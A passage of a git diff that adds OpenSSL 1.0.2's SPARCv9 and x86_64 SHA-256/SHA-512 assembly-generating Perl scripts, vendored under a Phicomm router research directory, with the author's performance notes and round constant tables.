+	ba	.Lhwfinish
+	nop
+___
+$code.=<<___ if ($SZ==4); 		# SHA256
+	ld	[%o0 + 0x00], %f0
+	ld	[%o0 + 0x04], %f1
+	ld	[%o0 + 0x08], %f2
+	ld	[%o0 + 0x0c], %f3
+	ld	[%o0 + 0x10], %f4
+	ld	[%o0 + 0x14], %f5
+	andcc	%o1, 0x7, %g0
+	ld	[%o0 + 0x18], %f6
+	bne,pn	%icc, .Lhwunaligned
+	 ld	[%o0 + 0x1c], %f7
+
+.Lhwloop:
+	ldd	[%o1 + 0x00], %f8
+	ldd	[%o1 + 0x08], %f10
+	ldd	[%o1 + 0x10], %f12
+	ldd	[%o1 + 0x18], %f14
+	ldd	[%o1 + 0x20], %f16
+	ldd	[%o1 + 0x28], %f18
+	ldd	[%o1 + 0x30], %f20
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x38], %f22
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	.word	0x81b02840		! SHA256
+
+	bne,pt	SIZE_T_CC, .Lhwloop
+	nop
+
+.Lhwfinish:
+	st	%f0, [%o0 + 0x00]	! store context
+	st	%f1, [%o0 + 0x04]
+	st	%f2, [%o0 + 0x08]
+	st	%f3, [%o0 + 0x0c]
+	st	%f4, [%o0 + 0x10]
+	st	%f5, [%o0 + 0x14]
+	st	%f6, [%o0 + 0x18]
+	retl
+	 st	%f7, [%o0 + 0x1c]
+
+.align	8
+.Lhwunaligned:
+	alignaddr %o1, %g0, %o1
+
+	ldd	[%o1 + 0x00], %f10
+.Lhwunaligned_loop:
+	ldd	[%o1 + 0x08], %f12
+	ldd	[%o1 + 0x10], %f14
+	ldd	[%o1 + 0x18], %f16
+	ldd	[%o1 + 0x20], %f18
+	ldd	[%o1 + 0x28], %f20
+	ldd	[%o1 + 0x30], %f22
+	ldd	[%o1 + 0x38], %f24
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x40], %f26
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	faligndata %f10, %f12, %f8
+	faligndata %f12, %f14, %f10
+	faligndata %f14, %f16, %f12
+	faligndata %f16, %f18, %f14
+	faligndata %f18, %f20, %f16
+	faligndata %f20, %f22, %f18
+	faligndata %f22, %f24, %f20
+	faligndata %f24, %f26, %f22
+
+	.word	0x81b02840		! SHA256
+
+	bne,pt	SIZE_T_CC, .Lhwunaligned_loop
+	for	%f26, %f26, %f10	! %f10=%f26
+
+	ba	.Lhwfinish
+	nop
+___
+$code.=<<___;
+.align	16
+.Lsoftware:
+	save	%sp,-STACK_FRAME-$locals,%sp
+	and	$inp,`$align-1`,$tmp31
+	sllx	$len,`log(16*$SZ)/log(2)`,$len
+	andn	$inp,`$align-1`,$inp
+	sll	$tmp31,3,$tmp31
+	add	$inp,$len,$len
+___
+$code.=<<___ if ($SZ==8); # SHA512
+	mov	32,$tmp32
+	sub	$tmp32,$tmp31,$tmp32
+___
+$code.=<<___;
+.Lpic:	call	.+8
+	add	%o7,K${label}-.Lpic,$Ktbl
+
+	$LD	[$ctx+`0*$SZ`],$A
+	$LD	[$ctx+`1*$SZ`],$B
+	$LD	[$ctx+`2*$SZ`],$C
+	$LD	[$ctx+`3*$SZ`],$D
+	$LD	[$ctx+`4*$SZ`],$E
+	$LD	[$ctx+`5*$SZ`],$F
+	$LD	[$ctx+`6*$SZ`],$G
+	$LD	[$ctx+`7*$SZ`],$H
+
+.Lloop:
+___
+for ($i=0;$i<16;$i++)	{ &BODY_00_15($i,@V); unshift(@V,pop(@V)); }
+$code.=".L16_xx:\n";
+for (;$i<32;$i++)	{ &$BODY_16_XX($i,@V); unshift(@V,pop(@V)); }
+$code.=<<___;
+	and	$tmp2,0xfff,$tmp2
+	cmp	$tmp2,$lastK
+	bne	.L16_xx
+	add	$Ktbl,`16*$SZ`,$Ktbl	! Ktbl+=16
+
+___
+$code.=<<___ if ($SZ==4); # SHA256
+	$LD	[$ctx+`0*$SZ`],@X[0]
+	$LD	[$ctx+`1*$SZ`],@X[1]
+	$LD	[$ctx+`2*$SZ`],@X[2]
+	$LD	[$ctx+`3*$SZ`],@X[3]
+	$LD	[$ctx+`4*$SZ`],@X[4]
+	$LD	[$ctx+`5*$SZ`],@X[5]
+	$LD	[$ctx+`6*$SZ`],@X[6]
+	$LD	[$ctx+`7*$SZ`],@X[7]
+
+	add	$A,@X[0],$A
+	$ST	$A,[$ctx+`0*$SZ`]
+	add	$B,@X[1],$B
+	$ST	$B,[$ctx+`1*$SZ`]
+	add	$C,@X[2],$C
+	$ST	$C,[$ctx+`2*$SZ`]
+	add	$D,@X[3],$D
+	$ST	$D,[$ctx+`3*$SZ`]
+	add	$E,@X[4],$E
+	$ST	$E,[$ctx+`4*$SZ`]
+	add	$F,@X[5],$F
+	$ST	$F,[$ctx+`5*$SZ`]
+	add	$G,@X[6],$G
+	$ST	$G,[$ctx+`6*$SZ`]
+	add	$H,@X[7],$H
+	$ST	$H,[$ctx+`7*$SZ`]
+___
+$code.=<<___ if ($SZ==8); # SHA512
+	ld	[$ctx+`0*$SZ+0`],%l0
+	ld	[$ctx+`0*$SZ+4`],%l1
+	ld	[$ctx+`1*$SZ+0`],%l2
+	ld	[$ctx+`1*$SZ+4`],%l3
+	ld	[$ctx+`2*$SZ+0`],%l4
+	ld	[$ctx+`2*$SZ+4`],%l5
+	ld	[$ctx+`3*$SZ+0`],%l6
+
+	sllx	%l0,32,$tmp0
+	ld	[$ctx+`3*$SZ+4`],%l7
+	sllx	%l2,32,$tmp1
+	or	%l1,$tmp0,$tmp0
+	or	%l3,$tmp1,$tmp1
+	add	$tmp0,$A,$A
+	add	$tmp1,$B,$B
+	$ST	$A,[$ctx+`0*$SZ`]
+	sllx	%l4,32,$tmp2
+	$ST	$B,[$ctx+`1*$SZ`]
+	sllx	%l6,32,$T1
+	or	%l5,$tmp2,$tmp2
+	or	%l7,$T1,$T1
+	add	$tmp2,$C,$C
+	$ST	$C,[$ctx+`2*$SZ`]
+	add	$T1,$D,$D
+	$ST	$D,[$ctx+`3*$SZ`]
+
+	ld	[$ctx+`4*$SZ+0`],%l0
+	ld	[$ctx+`4*$SZ+4`],%l1
+	ld	[$ctx+`5*$SZ+0`],%l2
+	ld	[$ctx+`5*$SZ+4`],%l3
+	ld	[$ctx+`6*$SZ+0`],%l4
+	ld	[$ctx+`6*$SZ+4`],%l5
+	ld	[$ctx+`7*$SZ+0`],%l6
+
+	sllx	%l0,32,$tmp0
+	ld	[$ctx+`7*$SZ+4`],%l7
+	sllx	%l2,32,$tmp1
+	or	%l1,$tmp0,$tmp0
+	or	%l3,$tmp1,$tmp1
+	add	$tmp0,$E,$E
+	add	$tmp1,$F,$F
+	$ST	$E,[$ctx+`4*$SZ`]
+	sllx	%l4,32,$tmp2
+	$ST	$F,[$ctx+`5*$SZ`]
+	sllx	%l6,32,$T1
+	or	%l5,$tmp2,$tmp2
+	or	%l7,$T1,$T1
+	add	$tmp2,$G,$G
+	$ST	$G,[$ctx+`6*$SZ`]
+	add	$T1,$H,$H
+	$ST	$H,[$ctx+`7*$SZ`]
+___
+$code.=<<___;
+	add	$inp,`16*$SZ`,$inp		! advance inp
+	cmp	$inp,$len
+	bne	SIZE_T_CC,.Lloop
+	sub	$Ktbl,`($rounds-16)*$SZ`,$Ktbl	! rewind Ktbl
+
+	ret
+	restore
+.type	sha${label}_block_data_order,#function
+.size	sha${label}_block_data_order,(.-sha${label}_block_data_order)
+.asciz	"SHA${label} block transform for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my $ref,$opf;
+my %visopf = (	"faligndata"	=> 0x048,
+		"for"		=> 0x07c	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+sub unalignaddr {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my $ref="$mnemonic\t$rs1,$rs2,$rd";
+
+    foreach ($rs1,$rs2,$rd) {
+	if (/%([goli])([0-7])/)	{ $_=$bias{$1}+$2; }
+	else			{ return $ref; }
+    }
+    return  sprintf ".word\t0x%08x !%s",
+		    0x81b00300|$rd<<25|$rs1<<14|$rs2,
+		    $ref;
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(f[^\s]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&unvis($1,$2,$3,$4)
+	 /ge;
+	s/\b(alignaddr)\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unalignaddr($1,$2,$3,$4)
+	 /ge;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-x86_64.pl
new file mode 100755
index 0000000..b7b44b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/sha/asm/sha512-x86_64.pl
@@ -0,0 +1,2398 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. Rights for redistribution and usage in source and binary
+# forms are granted according to the OpenSSL license.
+# ====================================================================
+#
+# sha256/512_block procedure for x86_64.
+#
+# 40% improvement over compiler-generated code on Opteron. On EM64T
+# sha256 was observed to run >80% faster and sha512 - >40%. No magical
+# tricks, just straight implementation... I really wonder why gcc
+# [being armed with inline assembler] fails to generate as fast code.
+# The only thing which is cool about this module is that it's very
+# same instruction sequence used for both SHA-256 and SHA-512. In
+# former case the instructions operate on 32-bit operands, while in
+# latter - on 64-bit ones. All I had to do is to get one flavor right,
+# the other one passed the test right away:-)
+#
+# sha256_block runs in ~1005 cycles on Opteron, which gives you
+# asymptotic performance of 64*1000/1005=63.7MBps times CPU clock
+# frequency in GHz. sha512_block runs in ~1275 cycles, which results
+# in 128*1000/1275=100MBps per GHz. Is there room for improvement?
+# Well, if you compare it to IA-64 implementation, which maintains
+# X[16] in register bank[!], tends to 4 instructions per CPU clock
+# cycle and runs in 1003 cycles, 1275 is very good result for 3-way
+# issue Opteron pipeline and X[16] maintained in memory. So that *if*
+# there is a way to improve it, *then* the only way would be to try to
+# offload X[16] updates to SSE unit, but that would require "deeper"
+# loop unroll, which in turn would naturally cause size blow-up, not
+# to mention increased complexity! And once again, only *if* it's
+# actually possible to noticeably improve overall ILP, instruction
+# level parallelism, on a given CPU implementation in this case.
+#
+# Special note on Intel EM64T. While Opteron CPU exhibits perfect
+# perfromance ratio of 1.5 between 64- and 32-bit flavors [see above],
+# [currently available] EM64T CPUs apparently are far from it. On the
+# contrary, 64-bit version, sha512_block, is ~30% *slower* than 32-bit
+# sha256_block:-( This is presumably because 64-bit shifts/rotates
+# apparently are not atomic instructions, but implemented in microcode.
+#
+# May 2012.
+#
+# Optimization including one of Pavel Semjanov's ideas, alternative
+# Maj, resulted in >=5% improvement on most CPUs, +20% SHA256 and
+# unfortunately -2% SHA512 on P4 [which nobody should care about
+# that much].
+#
+# June 2012.
+#
+# Add SIMD code paths, see below for improvement coefficients. SSSE3
+# code path was not attempted for SHA512, because improvement is not
+# estimated to be high enough, noticeably less than 9%, to justify
+# the effort, not on pre-AVX processors. [Obviously with exclusion
+# for VIA Nano, but it has SHA512 instruction that is faster and
+# should be used instead.] For reference, corresponding estimated
+# upper limit for improvement for SSSE3 SHA256 is 28%. The fact that
+# higher coefficients are observed on VIA Nano and Bulldozer has more
+# to do with specifics of their architecture [which is topic for
+# separate discussion].
+#
+# November 2012.
+#
+# Add AVX2 code path. Two consecutive input blocks are loaded to
+# 256-bit %ymm registers, with data from first block to least
+# significant 128-bit halves and data from second to most significant.
+# The data is then processed with same SIMD instruction sequence as
+# for AVX, but with %ymm as operands. Side effect is increased stack
+# frame, 448 additional bytes in SHA256 and 1152 in SHA512, and 1.2KB
+# code size increase.
+#
+# March 2014.
+#
+# Add support for Intel SHA Extensions.
+
+######################################################################
+# Current performance in cycles per processed byte (less is better):
+#
+#		SHA256	SSSE3       AVX/XOP(*)	    SHA512  AVX/XOP(*)
+#
+# AMD K8	14.9	-	    -		    9.57    -
+# P4		17.3	-	    -		    30.8    -
+# Core 2	15.6	13.8(+13%)  -		    9.97    -
+# Westmere	14.8	12.3(+19%)  -		    9.58    -
+# Sandy Bridge	17.4	14.2(+23%)  11.6(+50%(**))  11.2    8.10(+38%(**))
+# Ivy Bridge	12.6	10.5(+20%)  10.3(+22%)	    8.17    7.22(+13%)
+# Haswell	12.2	9.28(+31%)  7.80(+56%)	    7.66    5.40(+42%)
+# Bulldozer	21.1	13.6(+54%)  13.6(+54%(***)) 13.5    8.58(+57%)
+# VIA Nano	23.0	16.5(+39%)  -		    14.7    -
+# Atom		23.0	18.9(+22%)  -		    14.7    -
+# Silvermont	27.4	20.6(+33%)  -               17.5    -
+#
+# (*)	whichever best applicable;
+# (**)	switch from ror to shrd stands for fair share of improvement;
+# (***)	execution time is fully determined by remaining integer-only
+#	part, body_00_15; reducing the amount of SIMD instructions
+#	below certain limit makes no difference/sense; to conserve
+#	space SHA256 XOP code path is therefore omitted;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	   `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	   `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+$shaext=1;	### set to zero if compiling for 1.0.1
+$avx=1		if (!$shaext && $avx);
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if ($output =~ /512/) {
+	$func="sha512_block_data_order";
+	$TABLE="K512";
+	$SZ=8;
+	@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%rax","%rbx","%rcx","%rdx",
+					"%r8", "%r9", "%r10","%r11");
+	($T1,$a0,$a1,$a2,$a3)=("%r12","%r13","%r14","%r15","%rdi");
+	@Sigma0=(28,34,39);
+	@Sigma1=(14,18,41);
+	@sigma0=(1,  8, 7);
+	@sigma1=(19,61, 6);
+	$rounds=80;
+} else {
+	$func="sha256_block_data_order";
+	$TABLE="K256";
+	$SZ=4;
+	@ROT=($A,$B,$C,$D,$E,$F,$G,$H)=("%eax","%ebx","%ecx","%edx",
+					"%r8d","%r9d","%r10d","%r11d");
+	($T1,$a0,$a1,$a2,$a3)=("%r12d","%r13d","%r14d","%r15d","%edi");
+	@Sigma0=( 2,13,22);
+	@Sigma1=( 6,11,25);
+	@sigma0=( 7,18, 3);
+	@sigma1=(17,19,10);
+	$rounds=64;
+}
+
+$ctx="%rdi";	# 1st arg, zapped by $a3
+$inp="%rsi";	# 2nd arg
+$Tbl="%rbp";
+
+$_ctx="16*$SZ+0*8(%rsp)";
+$_inp="16*$SZ+1*8(%rsp)";
+$_end="16*$SZ+2*8(%rsp)";
+$_rsp="16*$SZ+3*8(%rsp)";
+$framesz="16*$SZ+4*8";
+
+
+sub ROUND_00_15()
+{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+  my $STRIDE=$SZ;
+     $STRIDE += 16 if ($i%(16/$SZ)==(16/$SZ-1));
+
+$code.=<<___;
+	ror	\$`$Sigma1[2]-$Sigma1[1]`,$a0
+	mov	$f,$a2
+
+	xor	$e,$a0
+	ror	\$`$Sigma0[2]-$Sigma0[1]`,$a1
+	xor	$g,$a2			# f^g
+
+	mov	$T1,`$SZ*($i&0xf)`(%rsp)
+	xor	$a,$a1
+	and	$e,$a2			# (f^g)&e
+
+	ror	\$`$Sigma1[1]-$Sigma1[0]`,$a0
+	add	$h,$T1			# T1+=h
+	xor	$g,$a2			# Ch(e,f,g)=((f^g)&e)^g
+
+	ror	\$`$Sigma0[1]-$Sigma0[0]`,$a1
+	xor	$e,$a0
+	add	$a2,$T1			# T1+=Ch(e,f,g)
+
+	mov	$a,$a2
+	add	($Tbl),$T1		# T1+=K[round]
+	xor	$a,$a1
+
+	xor	$b,$a2			# a^b, b^c in next round
+	ror	\$$Sigma1[0],$a0	# Sigma1(e)
+	mov	$b,$h
+
+	and	$a2,$a3
+	ror	\$$Sigma0[0],$a1	# Sigma0(a)
+	add	$a0,$T1			# T1+=Sigma1(e)
+
+	xor	$a3,$h			# h=Maj(a,b,c)=Ch(a^b,c,b)
+	add	$T1,$d			# d+=T1
+	add	$T1,$h			# h+=T1
+
+	lea	$STRIDE($Tbl),$Tbl	# round++
+___
+$code.=<<___ if ($i<15);
+	add	$a1,$h			# h+=Sigma0(a)
+___
+	($a2,$a3) = ($a3,$a2);
+}
+
+sub ROUND_16_XX()
+{ my ($i,$a,$b,$c,$d,$e,$f,$g,$h) = @_;
+
+$code.=<<___;
+	mov	`$SZ*(($i+1)&0xf)`(%rsp),$a0
+	mov	`$SZ*(($i+14)&0xf)`(%rsp),$a2
+
+	mov	$a0,$T1
+	ror	\$`$sigma0[1]-$sigma0[0]`,$a0
+	add	$a1,$a			# modulo-scheduled h+=Sigma0(a)
+	mov	$a2,$a1
+	ror	\$`$sigma1[1]-$sigma1[0]`,$a2
+
+	xor	$T1,$a0
+	shr	\$$sigma0[2],$T1
+	ror	\$$sigma0[0],$a0
+	xor	$a1,$a2
+	shr	\$$sigma1[2],$a1
+
+	ror	\$$sigma1[0],$a2
+	xor	$a0,$T1			# sigma0(X[(i+1)&0xf])
+	xor	$a1,$a2			# sigma1(X[(i+14)&0xf])
+	add	`$SZ*(($i+9)&0xf)`(%rsp),$T1
+
+	add	`$SZ*($i&0xf)`(%rsp),$T1
+	mov	$e,$a0
+	add	$a2,$T1
+	mov	$a,$a1
+___
+	&ROUND_00_15(@_);
+}
+
+$code=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+.globl	$func
+.type	$func,\@function,3
+.align	16
+$func:
+___
+$code.=<<___ if ($SZ==4 || $avx);
+	lea	OPENSSL_ia32cap_P(%rip),%r11
+	mov	0(%r11),%r9d
+	mov	4(%r11),%r10d
+	mov	8(%r11),%r11d
+___
+$code.=<<___ if ($SZ==4 && $shaext);
+	test	\$`1<<29`,%r11d		# check for SHA
+	jnz	_shaext_shortcut
+___
+$code.=<<___ if ($avx && $SZ==8);
+	test	\$`1<<11`,%r10d		# check for XOP
+	jnz	.Lxop_shortcut
+___
+$code.=<<___ if ($avx>1);
+	and	\$`1<<8|1<<5|1<<3`,%r11d	# check for BMI2+AVX2+BMI1
+	cmp	\$`1<<8|1<<5|1<<3`,%r11d
+	je	.Lavx2_shortcut
+___
+$code.=<<___ if ($avx);
+	and	\$`1<<30`,%r9d		# mask "Intel CPU" bit
+	and	\$`1<<28|1<<9`,%r10d	# mask AVX and SSSE3 bits
+	or	%r9d,%r10d
+	cmp	\$`1<<28|1<<9|1<<30`,%r10d
+	je	.Lavx_shortcut
+___
+$code.=<<___ if ($SZ==4);
+	test	\$`1<<9`,%r10d
+	jnz	.Lssse3_shortcut
+___
+$code.=<<___;
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	shl	\$4,%rdx		# num*16
+	sub	\$$framesz,%rsp
+	lea	($inp,%rdx,$SZ),%rdx	# inp+num*16*$SZ
+	and	\$-64,%rsp		# align stack frame
+	mov	$ctx,$_ctx		# save ctx, 1st arg
+	mov	$inp,$_inp		# save inp, 2nd arh
+	mov	%rdx,$_end		# save end pointer, "3rd" arg
+	mov	%r11,$_rsp		# save copy of %rsp
+.Lprologue:
+
+	mov	$SZ*0($ctx),$A
+	mov	$SZ*1($ctx),$B
+	mov	$SZ*2($ctx),$C
+	mov	$SZ*3($ctx),$D
+	mov	$SZ*4($ctx),$E
+	mov	$SZ*5($ctx),$F
+	mov	$SZ*6($ctx),$G
+	mov	$SZ*7($ctx),$H
+	jmp	.Lloop
+
+.align	16
+.Lloop:
+	mov	$B,$a3
+	lea	$TABLE(%rip),$Tbl
+	xor	$C,$a3			# magic
+___
+	for($i=0;$i<16;$i++) {
+		$code.="	mov	$SZ*$i($inp),$T1\n";
+		$code.="	mov	@ROT[4],$a0\n";
+		$code.="	mov	@ROT[0],$a1\n";
+		$code.="	bswap	$T1\n";
+		&ROUND_00_15($i,@ROT);
+		unshift(@ROT,pop(@ROT));
+	}
+$code.=<<___;
+	jmp	.Lrounds_16_xx
+.align	16
+.Lrounds_16_xx:
+___
+	for(;$i<32;$i++) {
+		&ROUND_16_XX($i,@ROT);
+		unshift(@ROT,pop(@ROT));
+	}
+
+$code.=<<___;
+	cmpb	\$0,`$SZ-1`($Tbl)
+	jnz	.Lrounds_16_xx
+
+	mov	$_ctx,$ctx
+	add	$a1,$A			# modulo-scheduled h+=Sigma0(a)
+	lea	16*$SZ($inp),$inp
+
+	add	$SZ*0($ctx),$A
+	add	$SZ*1($ctx),$B
+	add	$SZ*2($ctx),$C
+	add	$SZ*3($ctx),$D
+	add	$SZ*4($ctx),$E
+	add	$SZ*5($ctx),$F
+	add	$SZ*6($ctx),$G
+	add	$SZ*7($ctx),$H
+
+	cmp	$_end,$inp
+
+	mov	$A,$SZ*0($ctx)
+	mov	$B,$SZ*1($ctx)
+	mov	$C,$SZ*2($ctx)
+	mov	$D,$SZ*3($ctx)
+	mov	$E,$SZ*4($ctx)
+	mov	$F,$SZ*5($ctx)
+	mov	$G,$SZ*6($ctx)
+	mov	$H,$SZ*7($ctx)
+	jb	.Lloop
+
+	mov	$_rsp,%rsi
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue:
+	ret
+.size	$func,.-$func
+___
+
+if ($SZ==4) {
+$code.=<<___;
+.align	64
+.type	$TABLE,\@object
+$TABLE:
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x428a2f98,0x71374491,0xb5c0fbcf,0xe9b5dba5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0x3956c25b,0x59f111f1,0x923f82a4,0xab1c5ed5
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0xd807aa98,0x12835b01,0x243185be,0x550c7dc3
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0x72be5d74,0x80deb1fe,0x9bdc06a7,0xc19bf174
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0xe49b69c1,0xefbe4786,0x0fc19dc6,0x240ca1cc
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x2de92c6f,0x4a7484aa,0x5cb0a9dc,0x76f988da
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0x983e5152,0xa831c66d,0xb00327c8,0xbf597fc7
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0xc6e00bf3,0xd5a79147,0x06ca6351,0x14292967
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x27b70a85,0x2e1b2138,0x4d2c6dfc,0x53380d13
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0x650a7354,0x766a0abb,0x81c2c92e,0x92722c85
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xa2bfe8a1,0xa81a664b,0xc24b8b70,0xc76c51a3
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0xd192e819,0xd6990624,0xf40e3585,0x106aa070
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x19a4c116,0x1e376c08,0x2748774c,0x34b0bcb5
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x391c0cb3,0x4ed8aa4a,0x5b9cca4f,0x682e6ff3
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x748f82ee,0x78a5636f,0x84c87814,0x8cc70208
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+	.long	0x90befffa,0xa4506ceb,0xbef9a3f7,0xc67178f2
+
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
+	.long	0x00010203,0x04050607,0x08090a0b,0x0c0d0e0f
+	.long	0x03020100,0x0b0a0908,0xffffffff,0xffffffff
+	.long	0x03020100,0x0b0a0908,0xffffffff,0xffffffff
+	.long	0xffffffff,0xffffffff,0x03020100,0x0b0a0908
+	.long	0xffffffff,0xffffffff,0x03020100,0x0b0a0908
+	.asciz	"SHA256 block transform for x86_64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+} else {
+$code.=<<___;
+.align	64
+.type	$TABLE,\@object
+$TABLE:
+	.quad	0x428a2f98d728ae22,0x7137449123ef65cd
+	.quad	0x428a2f98d728ae22,0x7137449123ef65cd
+	.quad	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	.quad	0xb5c0fbcfec4d3b2f,0xe9b5dba58189dbbc
+	.quad	0x3956c25bf348b538,0x59f111f1b605d019
+	.quad	0x3956c25bf348b538,0x59f111f1b605d019
+	.quad	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	.quad	0x923f82a4af194f9b,0xab1c5ed5da6d8118
+	.quad	0xd807aa98a3030242,0x12835b0145706fbe
+	.quad	0xd807aa98a3030242,0x12835b0145706fbe
+	.quad	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
+	.quad	0x243185be4ee4b28c,0x550c7dc3d5ffb4e2
+	.quad	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	.quad	0x72be5d74f27b896f,0x80deb1fe3b1696b1
+	.quad	0x9bdc06a725c71235,0xc19bf174cf692694
+	.quad	0x9bdc06a725c71235,0xc19bf174cf692694
+	.quad	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	.quad	0xe49b69c19ef14ad2,0xefbe4786384f25e3
+	.quad	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	.quad	0x0fc19dc68b8cd5b5,0x240ca1cc77ac9c65
+	.quad	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	.quad	0x2de92c6f592b0275,0x4a7484aa6ea6e483
+	.quad	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	.quad	0x5cb0a9dcbd41fbd4,0x76f988da831153b5
+	.quad	0x983e5152ee66dfab,0xa831c66d2db43210
+	.quad	0x983e5152ee66dfab,0xa831c66d2db43210
+	.quad	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	.quad	0xb00327c898fb213f,0xbf597fc7beef0ee4
+	.quad	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	.quad	0xc6e00bf33da88fc2,0xd5a79147930aa725
+	.quad	0x06ca6351e003826f,0x142929670a0e6e70
+	.quad	0x06ca6351e003826f,0x142929670a0e6e70
+	.quad	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	.quad	0x27b70a8546d22ffc,0x2e1b21385c26c926
+	.quad	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	.quad	0x4d2c6dfc5ac42aed,0x53380d139d95b3df
+	.quad	0x650a73548baf63de,0x766a0abb3c77b2a8
+	.quad	0x650a73548baf63de,0x766a0abb3c77b2a8
+	.quad	0x81c2c92e47edaee6,0x92722c851482353b
+	.quad	0x81c2c92e47edaee6,0x92722c851482353b
+	.quad	0xa2bfe8a14cf10364,0xa81a664bbc423001
+	.quad	0xa2bfe8a14cf10364,0xa81a664bbc423001
